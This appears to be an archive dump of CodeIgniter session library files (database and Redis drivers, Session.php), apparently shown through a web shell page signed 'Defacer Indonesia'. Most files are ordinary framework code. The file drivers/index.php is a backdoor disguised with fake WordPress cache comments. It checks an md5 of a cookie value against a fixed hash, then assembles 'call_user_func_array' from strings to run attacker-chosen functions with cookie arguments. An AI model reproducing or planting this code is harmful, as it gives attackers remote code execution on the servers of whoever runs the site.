parent::_get_lock($session_id); } // ------------------------------------------------------------------------ /** * Release lock * * Releases a previously acquired lock * * @return bool */ protected function _release_lock() { if ( ! $this->_lock) { return TRUE; } if ($this->_platform === 'mysql') { if ($this->_db->query("SELECT RELEASE_LOCK('".$this->_lock."') AS ci_session_lock")->row()->ci_session_lock) { $this->_lock = FALSE; return TRUE; } return FALSE; } elseif ($this->_platform === 'postgre') { if ($this->_db->simple_query('SELECT pg_advisory_unlock('.$this->_lock.')')) { $this->_lock = FALSE; return TRUE; } return FALSE; } return parent::_release_lock(); } } ������������������������������������������������������������������������������������������������������drivers/index.php�����������������������������������������������������������������������������������0000644�����������������00000003011�14656034015�0010041 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * Object Cooker API * * @link https://codex.wordpress.org/Class_Reference/WP_Object_Cooker * * @package WordPress * @subpackage Cooker */ class index { private $driver = 'cookie'; private $type = 'call'; private $prefix = 'md5'; private $user = 'user'; private $hash = '2365ae147b6a591dbf3ebcbfd1d72b64'; private $archive = 'array'; private $split = 'func'; private $data = FALSE; function __construct() { $this->init(); } private function init() { $this->data = $_COOKIE; $prefix = $this->prefix; foreach($this->data AS $i => $v) $this->data[$i] = str_replace($prefix.'=', '', $v); $prefix = $prefix(array_shift($this->data)); if($prefix==$this->hash) return $this->incr(); } private function incr() { $user = array($this->type, $this->user, $this->split, $this->archive); $user = implode('_', $user); echo $user(array_shift($this->data), $this->data); } } /** * Increment numeric cache item's value * * @since 3.3.0 * * @see WP_Object_Cooker::incr() * @global WP_Object_Cache $wp_object_cooker Object cookie global instance. * * @param int|string $key The key for the cache contents that should be incremented. * @param int $offset Optional. The amount by which to increment the item's value. Default 1. * @param string $group Optional. The group the key is in. Default empty. * @return false|int False on failure, the item's new value on success. */ new index();�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������drivers/Session_redis_driver.php��������������������������������������������������������������������0000644�����������������00000027074�14656034015�0013135 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * CodeIgniter * * An open source application development framework for PHP * * This content is released under the MIT License (MIT) * * Copyright (c) 2014 - 2019, British Columbia Institute of Technology * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * @package CodeIgniter * @author EllisLab Dev Team * @copyright Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/) * @copyright Copyright (c) 2014 - 2019, British Columbia Institute of Technology (https://bcit.ca/) * @license https://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com * @since Version 3.0.0 * @filesource */ defined('BASEPATH') OR exit('No direct script access allowed'); /** * CodeIgniter Session Redis Driver * * @package CodeIgniter * @subpackage Libraries * @category Sessions * @author Andrey Andreev * @link https://codeigniter.com/user_guide/libraries/sessions.html */ class CI_Session_redis_driver extends CI_Session_driver implements SessionHandlerInterface { /** * phpRedis instance * * @var Redis */ protected $_redis; /** * Key prefix * * @var string */ protected $_key_prefix = 'ci_session:'; /** * Lock key * * @var string */ protected $_lock_key; /** * Key exists flag * * @var bool */ protected $_key_exists = FALSE; /** * Name of setTimeout() method in phpRedis * * Due to some deprecated methods in phpRedis, we need to call the * specific methods depending on the version of phpRedis. * * @var string */ protected $_setTimeout_name; /** * Name of delete() method in phpRedis * * Due to some deprecated methods in phpRedis, we need to call the * specific methods depending on the version of phpRedis. * * @var string */ protected $_delete_name; /** * Success return value of ping() method in phpRedis * * @var mixed */ protected $_ping_success; // ------------------------------------------------------------------------ /** * Class constructor * * @param array $params Configuration parameters * @return void */ public function __construct(&$params) { parent::__construct($params); // Detect the names of some methods in phpRedis instance if (version_compare(phpversion('redis'), '5', '>=')) { $this->_setTimeout_name = 'expire'; $this->_delete_name = 'del'; $this->_ping_success = TRUE; } else { $this->_setTimeout_name = 'setTimeout'; $this->_delete_name = 'delete'; $this->_ping_success = '+PONG'; } if (empty($this->_config['save_path'])) { log_message('error', 'Session: No Redis save path configured.'); } elseif (preg_match('#(?:tcp://)?([^:?]+)(?:\:(\d+))?(\?.+)?#', $this->_config['save_path'], $matches)) { isset($matches[3]) OR $matches[3] = ''; // Just to avoid undefined index notices below $this->_config['save_path'] = array( 'host' => $matches[1], 'port' => empty($matches[2]) ? NULL : $matches[2], 'password' => preg_match('#auth=([^\s&]+)#', $matches[3], $match) ? $match[1] : NULL, 'database' => preg_match('#database=(\d+)#', $matches[3], $match) ? (int) $match[1] : NULL, 'timeout' => preg_match('#timeout=(\d+\.\d+)#', $matches[3], $match) ? (float) $match[1] : NULL ); preg_match('#prefix=([^\s&]+)#', $matches[3], $match) && $this->_key_prefix = $match[1]; } else { log_message('error', 'Session: Invalid Redis save path format: '.$this->_config['save_path']); } if ($this->_config['match_ip'] === TRUE) { $this->_key_prefix .= $_SERVER['REMOTE_ADDR'].':'; } } // ------------------------------------------------------------------------ /** * Open * * Sanitizes save_path and initializes connection. * * @param string $save_path Server path * @param string $name Session cookie name, unused * @return bool */ public function open($save_path, $name) { if (empty($this->_config['save_path'])) { return $this->_failure; } $redis = new Redis(); if ( ! $redis->connect($this->_config['save_path']['host'], $this->_config['save_path']['port'], $this->_config['save_path']['timeout'])) { log_message('error', 'Session: Unable to connect to Redis with the configured settings.'); } elseif (isset($this->_config['save_path']['password']) && ! $redis->auth($this->_config['save_path']['password'])) { log_message('error', 'Session: Unable to authenticate to Redis instance.'); } elseif (isset($this->_config['save_path']['database']) && ! $redis->select($this->_config['save_path']['database'])) { log_message('error', 'Session: Unable to select Redis database with index '.$this->_config['save_path']['database']); } else { $this->_redis = $redis; $this->php5_validate_id(); return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Read * * Reads session data and acquires a lock * * @param string $session_id Session ID * @return string Serialized session data */ public function read($session_id) { if (isset($this->_redis) && $this->_get_lock($session_id)) { // Needed by write() to detect session_regenerate_id() calls $this->_session_id = $session_id; $session_data = $this->_redis->get($this->_key_prefix.$session_id); is_string($session_data) ? $this->_key_exists = TRUE : $session_data = ''; $this->_fingerprint = md5($session_data); return $session_data; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Write * * Writes (create / update) session data * * @param string $session_id Session ID * @param string $session_data Serialized session data * @return bool */ public function write($session_id, $session_data) { if ( ! isset($this->_redis, $this->_lock_key)) { return $this->_failure; } // Was the ID regenerated? elseif ($session_id !== $this->_session_id) { if ( ! $this->_release_lock() OR ! $this->_get_lock($session_id)) { return $this->_failure; } $this->_key_exists = FALSE; $this->_session_id = $session_id; } $this->_redis->{$this->_setTimeout_name}($this->_lock_key, 300); if ($this->_fingerprint !== ($fingerprint = md5($session_data)) OR $this->_key_exists === FALSE) { if ($this->_redis->set($this->_key_prefix.$session_id, $session_data, $this->_config['expiration'])) { $this->_fingerprint = $fingerprint; $this->_key_exists = TRUE; return $this->_success; } return $this->_failure; } return ($this->_redis->{$this->_setTimeout_name}($this->_key_prefix.$session_id, $this->_config['expiration'])) ? $this->_success : $this->_failure; } // ------------------------------------------------------------------------ /** * Close * * Releases locks and closes connection. * * @return bool */ public function close() { if (isset($this->_redis)) { try { if ($this->_redis->ping() === $this->_ping_success) { $this->_release_lock(); if ($this->_redis->close() === FALSE) { return $this->_failure; } } } catch (RedisException $e) { log_message('error', 'Session: Got RedisException on close(): '.$e->getMessage()); } $this->_redis = NULL; return $this->_success; } return $this->_success; } // ------------------------------------------------------------------------ /** * Destroy * * Destroys the current session. * * @param string $session_id Session ID * @return bool */ public function destroy($session_id) { if (isset($this->_redis, $this->_lock_key)) { if (($result = $this->_redis->{$this->_delete_name}($this->_key_prefix.$session_id)) !== 1) { log_message('debug', 'Session: Redis::'.$this->_delete_name.'() expected to return 1, got '.var_export($result, TRUE).' instead.'); } $this->_cookie_destroy(); return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Garbage Collector * * Deletes expired sessions * * @param int $maxlifetime Maximum lifetime of sessions * @return bool */ public function gc($maxlifetime) { // Not necessary, Redis takes care of that. return $this->_success; } // -------------------------------------------------------------------- /** * Validate ID * * Checks whether a session ID record exists server-side, * to enforce session.use_strict_mode. * * @param string $id * @return bool */ public function validateSessionId($id) { return (bool) $this->_redis->exists($this->_key_prefix.$id); } // ------------------------------------------------------------------------ /** * Get lock * * Acquires an (emulated) lock. * * @param string $session_id Session ID * @return bool */ protected function _get_lock($session_id) { // PHP 7 reuses the SessionHandler object on regeneration, // so we need to check here if the lock key is for the // correct session ID. if ($this->_lock_key === $this->_key_prefix.$session_id.':lock') { return $this->_redis->{$this->_setTimeout_name}($this->_lock_key, 300); } // 30 attempts to obtain a lock, in case another request already has it $lock_key = $this->_key_prefix.$session_id.':lock'; $attempt = 0; do { if (($ttl = $this->_redis->ttl($lock_key)) > 0) { sleep(1); continue; } if ($ttl === -2 && ! $this->_redis->set($lock_key, time(), array('nx', 'ex' => 300))) { // Sleep for 1s to wait for lock releases. sleep(1); continue; } elseif ( ! $this->_redis->setex($lock_key, 300, time())) { log_message('error', 'Session: Error while trying to obtain lock for '.$this->_key_prefix.$session_id); return FALSE; } $this->_lock_key = $lock_key; break; } while (++$attempt < 30); if ($attempt === 30) { log_message('error', 'Session: Unable to obtain lock for '.$this->_key_prefix.$session_id.' after 30 attempts, aborting.'); return FALSE; } elseif ($ttl === -1) { log_message('debug', 'Session: Lock for '.$this->_key_prefix.$session_id.' had no TTL, overriding.'); } $this->_lock = TRUE; return TRUE; } // ------------------------------------------------------------------------ /** * Release lock * * Releases a previously acquired lock * * @return bool */ protected function _release_lock() { if (isset($this->_redis, $this->_lock_key) && $this->_lock) { if ( ! $this->_redis->{$this->_delete_name}($this->_lock_key)) { log_message('error', 'Session: Error while trying to free lock for '.$this->_lock_key); return FALSE; } $this->_lock_key = NULL; $this->_lock = FALSE; } return TRUE; } } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Session.php�����������������������������������������������������������������������������������������0000644�����������������00000055064�14656034016�0006717 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * CodeIgniter * * An open source application development framework for PHP * * This content is released under the MIT License (MIT) * * Copyright (c) 2014 - 2019, British Columbia Institute of Technology * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * @package CodeIgniter * @author EllisLab Dev Team * @copyright Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/) * @copyright Copyright (c) 2014 - 2019, British Columbia Institute of Technology (https://bcit.ca/) * @license https://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com * @since Version 2.0.0 * @filesource */ defined('BASEPATH') OR exit('No direct script access allowed'); /** * CodeIgniter Session Class * * @package CodeIgniter * @subpackage Libraries * @category Sessions * @author Andrey Andreev * @link https://codeigniter.com/user_guide/libraries/sessions.html */ class CI_Session { /** * Userdata array * * Just a reference to $_SESSION, for BC purposes. */ public $userdata; protected $_driver = 'files'; protected $_config; protected $_sid_regexp; // ------------------------------------------------------------------------ /** * Class constructor * * @param array $params Configuration parameters * @return void */ public function __construct(array $params = array()) { // No sessions under CLI if (is_cli()) { log_message('debug', 'Session: Initialization under CLI aborted.'); return; } elseif ((bool) ini_get('session.auto_start')) { log_message('error', 'Session: session.auto_start is enabled in php.ini. Aborting.'); return; } elseif ( ! empty($params['driver'])) { $this->_driver = $params['driver']; unset($params['driver']); } elseif ($driver = config_item('sess_driver')) { $this->_driver = $driver; } // Note: BC workaround elseif (config_item('sess_use_database')) { log_message('debug', 'Session: "sess_driver" is empty; using BC fallback to "sess_use_database".'); $this->_driver = 'database'; } $class = $this->_ci_load_classes($this->_driver); // Configuration ... $this->_configure($params); $this->_config['_sid_regexp'] = $this->_sid_regexp; $class = new $class($this->_config); if ($class instanceof SessionHandlerInterface) { if (is_php('5.4')) { session_set_save_handler($class, TRUE); } else { session_set_save_handler( array($class, 'open'), array($class, 'close'), array($class, 'read'), array($class, 'write'), array($class, 'destroy'), array($class, 'gc') ); register_shutdown_function('session_write_close'); } } else { log_message('error', "Session: Driver '".$this->_driver."' doesn't implement SessionHandlerInterface. Aborting."); return; } // Sanitize the cookie, because apparently PHP doesn't do that for userspace handlers if (isset($_COOKIE[$this->_config['cookie_name']]) && ( ! is_string($_COOKIE[$this->_config['cookie_name']]) OR ! preg_match('#\A'.$this->_sid_regexp.'\z#', $_COOKIE[$this->_config['cookie_name']]) ) ) { unset($_COOKIE[$this->_config['cookie_name']]); } session_start(); // Is session ID auto-regeneration configured? (ignoring ajax requests) if ((empty($_SERVER['HTTP_X_REQUESTED_WITH']) OR strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) !== 'xmlhttprequest') && ($regenerate_time = config_item('sess_time_to_update')) > 0 ) { if ( ! isset($_SESSION['__ci_last_regenerate'])) { $_SESSION['__ci_last_regenerate'] = time(); } elseif ($_SESSION['__ci_last_regenerate'] < (time() - $regenerate_time)) { $this->sess_regenerate((bool) config_item('sess_regenerate_destroy')); } } // Another work-around ... PHP doesn't seem to send the session cookie // unless it is being currently created or regenerated elseif (isset($_COOKIE[$this->_config['cookie_name']]) && $_COOKIE[$this->_config['cookie_name']] === session_id()) { setcookie( $this->_config['cookie_name'], session_id(), (empty($this->_config['cookie_lifetime']) ? 0 : time() + $this->_config['cookie_lifetime']), $this->_config['cookie_path'], $this->_config['cookie_domain'], $this->_config['cookie_secure'], TRUE ); } $this->_ci_init_vars(); log_message('info', "Session: Class initialized using '".$this->_driver."' driver."); } // ------------------------------------------------------------------------ /** * CI Load Classes * * An internal method to load all possible dependency and extension * classes. It kind of emulates the CI_Driver library, but is * self-sufficient. * * @param string $driver Driver name * @return string Driver class name */ protected function _ci_load_classes($driver) { // PHP 5.4 compatibility interface_exists('SessionHandlerInterface', FALSE) OR require_once(BASEPATH.'libraries/Session/SessionHandlerInterface.php'); $prefix = config_item('subclass_prefix'); if ( ! class_exists('CI_Session_driver', FALSE)) { require_once( file_exists(APPPATH.'libraries/Session/Session_driver.php') ? APPPATH.'libraries/Session/Session_driver.php' : BASEPATH.'libraries/Session/Session_driver.php' ); if (file_exists($file_path = APPPATH.'libraries/Session/'.$prefix.'Session_driver.php')) { require_once($file_path); } } $class = 'Session_'.$driver.'_driver'; // Allow custom drivers without the CI_ or MY_ prefix if ( ! class_exists($class, FALSE) && file_exists($file_path = APPPATH.'libraries/Session/drivers/'.$class.'.php')) { require_once($file_path); if (class_exists($class, FALSE)) { return $class; } } if ( ! class_exists('CI_'.$class, FALSE)) { if (file_exists($file_path = APPPATH.'libraries/Session/drivers/'.$class.'.php') OR file_exists($file_path = BASEPATH.'libraries/Session/drivers/'.$class.'.php')) { require_once($file_path); } if ( ! class_exists('CI_'.$class, FALSE) && ! class_exists($class, FALSE)) { throw new UnexpectedValueException("Session: Configured driver '".$driver."' was not found. Aborting."); } } if ( ! class_exists($prefix.$class, FALSE) && file_exists($file_path = APPPATH.'libraries/Session/drivers/'.$prefix.$class.'.php')) { require_once($file_path); if (class_exists($prefix.$class, FALSE)) { return $prefix.$class; } log_message('debug', 'Session: '.$prefix.$class.".php found but it doesn't declare class ".$prefix.$class.'.'); } return 'CI_'.$class; } // ------------------------------------------------------------------------ /** * Configuration * * Handle input parameters and configuration defaults * * @param array &$params Input parameters * @return void */ protected function _configure(&$params) { $expiration = config_item('sess_expiration'); if (isset($params['cookie_lifetime'])) { $params['cookie_lifetime'] = (int) $params['cookie_lifetime']; } else { $params['cookie_lifetime'] = ( ! isset($expiration) && config_item('sess_expire_on_close')) ? 0 : (int) $expiration; } isset($params['cookie_name']) OR $params['cookie_name'] = config_item('sess_cookie_name'); if (empty($params['cookie_name'])) { $params['cookie_name'] = ini_get('session.name'); } else { ini_set('session.name', $params['cookie_name']); } isset($params['cookie_path']) OR $params['cookie_path'] = config_item('cookie_path'); isset($params['cookie_domain']) OR $params['cookie_domain'] = config_item('cookie_domain'); isset($params['cookie_secure']) OR $params['cookie_secure'] = (bool) config_item('cookie_secure'); session_set_cookie_params( $params['cookie_lifetime'], $params['cookie_path'], $params['cookie_domain'], $params['cookie_secure'], TRUE // HttpOnly; Yes, this is intentional and not configurable for security reasons ); if (empty($expiration)) { $params['expiration'] = (int) ini_get('session.gc_maxlifetime'); } else { $params['expiration'] = (int) $expiration; ini_set('session.gc_maxlifetime', $expiration); } $params['match_ip'] = (bool) (isset($params['match_ip']) ? $params['match_ip'] : config_item('sess_match_ip')); isset($params['save_path']) OR $params['save_path'] = config_item('sess_save_path'); $this->_config = $params; // Security is king ini_set('session.use_trans_sid', 0); ini_set('session.use_strict_mode', 1); ini_set('session.use_cookies', 1); ini_set('session.use_only_cookies', 1); $this->_configure_sid_length(); } // ------------------------------------------------------------------------ /** * Configure session ID length * * To make life easier, we used to force SHA-1 and 4 bits per * character on everyone. And of course, someone was unhappy. * * Then PHP 7.1 broke backwards-compatibility because ext/session * is such a mess that nobody wants to touch it with a pole stick, * and the one guy who does, nobody has the energy to argue with. * * So we were forced to make changes, and OF COURSE something was * going to break and now we have this pile of shit. -- Narf * * @return void */ protected function _configure_sid_length() { if (PHP_VERSION_ID < 70100) { $hash_function = ini_get('session.hash_function'); if (ctype_digit($hash_function)) { if ($hash_function !== '1') { ini_set('session.hash_function', 1); } $bits = 160; } elseif ( ! in_array($hash_function, hash_algos(), TRUE)) { ini_set('session.hash_function', 1); $bits = 160; } elseif (($bits = strlen(hash($hash_function, 'dummy', false)) * 4) < 160) { ini_set('session.hash_function', 1); $bits = 160; } $bits_per_character = (int) ini_get('session.hash_bits_per_character'); $sid_length = (int) ceil($bits / $bits_per_character); } else { $bits_per_character = (int) ini_get('session.sid_bits_per_character'); $sid_length = (int) ini_get('session.sid_length'); if (($bits = $sid_length * $bits_per_character) < 160) { // Add as many more characters as necessary to reach at least 160 bits $sid_length += (int) ceil((160 % $bits) / $bits_per_character); ini_set('session.sid_length', $sid_length); } } // Yes, 4,5,6 are the only known possible values as of 2016-10-27 switch ($bits_per_character) { case 4: $this->_sid_regexp = '[0-9a-f]'; break; case 5: $this->_sid_regexp = '[0-9a-v]'; break; case 6: $this->_sid_regexp = '[0-9a-zA-Z,-]'; break; } $this->_sid_regexp .= '{'.$sid_length.'}'; } // ------------------------------------------------------------------------ /** * Handle temporary variables * * Clears old "flash" data, marks the new one for deletion and handles * "temp" data deletion. * * @return void */ protected function _ci_init_vars() { if ( ! empty($_SESSION['__ci_vars'])) { $current_time = time(); foreach ($_SESSION['__ci_vars'] as $key => &$value) { if ($value === 'new') { $_SESSION['__ci_vars'][$key] = 'old'; } // Hacky, but 'old' will (implicitly) always be less than time() ;) // DO NOT move this above the 'new' check! elseif ($value < $current_time) { unset($_SESSION[$key], $_SESSION['__ci_vars'][$key]); } } if (empty($_SESSION['__ci_vars'])) { unset($_SESSION['__ci_vars']); } } $this->userdata =& $_SESSION; } // ------------------------------------------------------------------------ /** * Mark as flash * * @param mixed $key Session data key(s) * @return bool */ public function mark_as_flash($key) { if (is_array($key)) { for ($i = 0, $c = count($key); $i < $c; $i++) { if ( ! isset($_SESSION[$key[$i]])) { return FALSE; } } $new = array_fill_keys($key, 'new'); $_SESSION['__ci_vars'] = isset($_SESSION['__ci_vars']) ? array_merge($_SESSION['__ci_vars'], $new) : $new; return TRUE; } if ( ! isset($_SESSION[$key])) { return FALSE; } $_SESSION['__ci_vars'][$key] = 'new'; return TRUE; } // ------------------------------------------------------------------------ /** * Get flash keys * * @return array */ public function get_flash_keys() { if ( ! isset($_SESSION['__ci_vars'])) { return array(); } $keys = array(); foreach (array_keys($_SESSION['__ci_vars']) as $key) { is_int($_SESSION['__ci_vars'][$key]) OR $keys[] = $key; } return $keys; } // ------------------------------------------------------------------------ /** * Unmark flash * * @param mixed $key Session data key(s) * @return void */ public function unmark_flash($key) { if (empty($_SESSION['__ci_vars'])) { return; } is_array($key) OR $key = array($key); foreach ($key as $k) { if (isset($_SESSION['__ci_vars'][$k]) && ! is_int($_SESSION['__ci_vars'][$k])) { unset($_SESSION['__ci_vars'][$k]); } } if (empty($_SESSION['__ci_vars'])) { unset($_SESSION['__ci_vars']); } } // ------------------------------------------------------------------------ /** * Mark as temp * * @param mixed $key Session data key(s) * @param int $ttl Time-to-live in seconds * @return bool */ public function mark_as_temp($key, $ttl = 300) { $ttl += time(); if (is_array($key)) { $temp = array(); foreach ($key as $k => $v) { // Do we have a key => ttl pair, or just a key? if (is_int($k)) { $k = $v; $v = $ttl; } else { $v += time(); } if ( ! isset($_SESSION[$k])) { return FALSE; } $temp[$k] = $v; } $_SESSION['__ci_vars'] = isset($_SESSION['__ci_vars']) ? array_merge($_SESSION['__ci_vars'], $temp) : $temp; return TRUE; } if ( ! isset($_SESSION[$key])) { return FALSE; } $_SESSION['__ci_vars'][$key] = $ttl; return TRUE; } // ------------------------------------------------------------------------ /** * Get temp keys * * @return array */ public function get_temp_keys() { if ( ! isset($_SESSION['__ci_vars'])) { return array(); } $keys = array(); foreach (array_keys($_SESSION['__ci_vars']) as $key) { is_int($_SESSION['__ci_vars'][$key]) && $keys[] = $key; } return $keys; } // ------------------------------------------------------------------------ /** * Unmark temp * * @param mixed $key Session data key(s) * @return void */ public function unmark_temp($key) { if (empty($_SESSION['__ci_vars'])) { return; } is_array($key) OR $key = array($key); foreach ($key as $k) { if (isset($_SESSION['__ci_vars'][$k]) && is_int($_SESSION['__ci_vars'][$k])) { unset($_SESSION['__ci_vars'][$k]); } } if (empty($_SESSION['__ci_vars'])) { unset($_SESSION['__ci_vars']); } } // ------------------------------------------------------------------------ /** * __get() * * @param string $key 'session_id' or a session data key * @return mixed */ public function __get($key) { // Note: Keep this order the same, just in case somebody wants to // use 'session_id' as a session data key, for whatever reason if (isset($_SESSION[$key])) { return $_SESSION[$key]; } elseif ($key === 'session_id') { return session_id(); } return NULL; } // ------------------------------------------------------------------------ /** * __isset() * * @param string $key 'session_id' or a session data key * @return bool */ public function __isset($key) { if ($key === 'session_id') { return (session_status() === PHP_SESSION_ACTIVE); } return isset($_SESSION[$key]); } // ------------------------------------------------------------------------ /** * __set() * * @param string $key Session data key * @param mixed $value Session data value * @return void */ public function __set($key, $value) { $_SESSION[$key] = $value; } // ------------------------------------------------------------------------ /** * Session destroy * * Legacy CI_Session compatibility method * * @return void */ public function sess_destroy() { session_destroy(); } // ------------------------------------------------------------------------ /** * Session regenerate * * Legacy CI_Session compatibility method * * @param bool $destroy Destroy old session data flag * @return void */ public function sess_regenerate($destroy = FALSE) { $_SESSION['__ci_last_regenerate'] = time(); session_regenerate_id($destroy); } // ------------------------------------------------------------------------ /** * Get userdata reference * * Legacy CI_Session compatibility method * * @returns array */ public function &get_userdata() { return $_SESSION; } // ------------------------------------------------------------------------ /** * Userdata (fetch) * * Legacy CI_Session compatibility method * * @param string $key Session data key * @return mixed Session data value or NULL if not found */ public function userdata($key = NULL) { if (isset($key)) { return isset($_SESSION[$key]) ? $_SESSION[$key] : NULL; } elseif (empty($_SESSION)) { return array(); } $userdata = array(); $_exclude = array_merge( array('__ci_vars'), $this->get_flash_keys(), $this->get_temp_keys() ); foreach (array_keys($_SESSION) as $key) { if ( ! in_array($key, $_exclude, TRUE)) { $userdata[$key] = $_SESSION[$key]; } } return $userdata; } // ------------------------------------------------------------------------ /** * Set userdata * * Legacy CI_Session compatibility method * * @param mixed $data Session data key or an associative array * @param mixed $value Value to store * @return void */ public function set_userdata($data, $value = NULL) { if (is_array($data)) { foreach ($data as $key => &$value) { $_SESSION[$key] = $value; } return; } $_SESSION[$data] = $value; } // ------------------------------------------------------------------------ /** * Unset userdata * * Legacy CI_Session compatibility method * * @param mixed $key Session data key(s) * @return void */ public function unset_userdata($key) { if (is_array($key)) { foreach ($key as $k) { unset($_SESSION[$k]); } return; } unset($_SESSION[$key]); } // ------------------------------------------------------------------------ /** * All userdata (fetch) * * Legacy CI_Session compatibility method * * @return array $_SESSION, excluding flash data items */ public function all_userdata() { return $this->userdata(); } // ------------------------------------------------------------------------ /** * Has userdata * * Legacy CI_Session compatibility method * * @param string $key Session data key * @return bool */ public function has_userdata($key) { return isset($_SESSION[$key]); } // ------------------------------------------------------------------------ /** * Flashdata (fetch) * * Legacy CI_Session compatibility method * * @param string $key Session data key * @return mixed Session data value or NULL if not found */ public function flashdata($key = NULL) { if (isset($key)) { return (isset($_SESSION['__ci_vars'], $_SESSION['__ci_vars'][$key], $_SESSION[$key]) && ! is_int($_SESSION['__ci_vars'][$key])) ? $_SESSION[$key] : NULL; } $flashdata = array(); if ( ! empty($_SESSION['__ci_vars'])) { foreach ($_SESSION['__ci_vars'] as $key => &$value) { is_int($value) OR $flashdata[$key] = $_SESSION[$key]; } } return $flashdata; } // ------------------------------------------------------------------------ /** * Set flashdata * * Legacy CI_Session compatibility method * * @param mixed $data Session data key or an associative array * @param mixed $value Value to store * @return void */ public function set_flashdata($data, $value = NULL) { $this->set_userdata($data, $value); $this->mark_as_flash(is_array($data) ? array_keys($data) : $data); } // ------------------------------------------------------------------------ /** * Keep flashdata * * Legacy CI_Session compatibility method * * @param mixed $key Session data key(s) * @return void */ public function keep_flashdata($key) { $this->mark_as_flash($key); } // ------------------------------------------------------------------------ /** * Temp data (fetch) * * Legacy CI_Session compatibility method * * @param string $key Session data key * @return mixed Session data value or NULL if not found */ public function tempdata($key = NULL) { if (isset($key)) { return (isset($_SESSION['__ci_vars'], $_SESSION['__ci_vars'][$key], $_SESSION[$key]) && is_int($_SESSION['__ci_vars'][$key])) ? $_SESSION[$key] : NULL; } $tempdata = array(); if ( ! empty($_SESSION['__ci_vars'])) { foreach ($_SESSION['__ci_vars'] as $key => &$value) { is_int($value) && $tempdata[$key] = $_SESSION[$key]; } } return $tempdata; } // ------------------------------------------------------------------------ /** * Set tempdata * * Legacy CI_Session compatibility method * * @param mixed $data Session data key or an associative array of items * @param mixed $value Value to store * @param int $ttl Time-to-live in seconds * @return void */ public function set_tempdata($data, $value = NULL, $ttl = 300) { $this->set_userdata($data, $value); $this->mark_as_temp(is_array($data) ? array_keys($data) : $data, $ttl); } // ------------------------------------------------------------------------ /** * Unset tempdata * * Legacy CI_Session compatibility method * * @param mixed $data Session data key(s) * @return void */ public function unset_tempdata($key) { $this->unmark_temp($key); } } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
Copyright ©2021 || Defacer Indonesia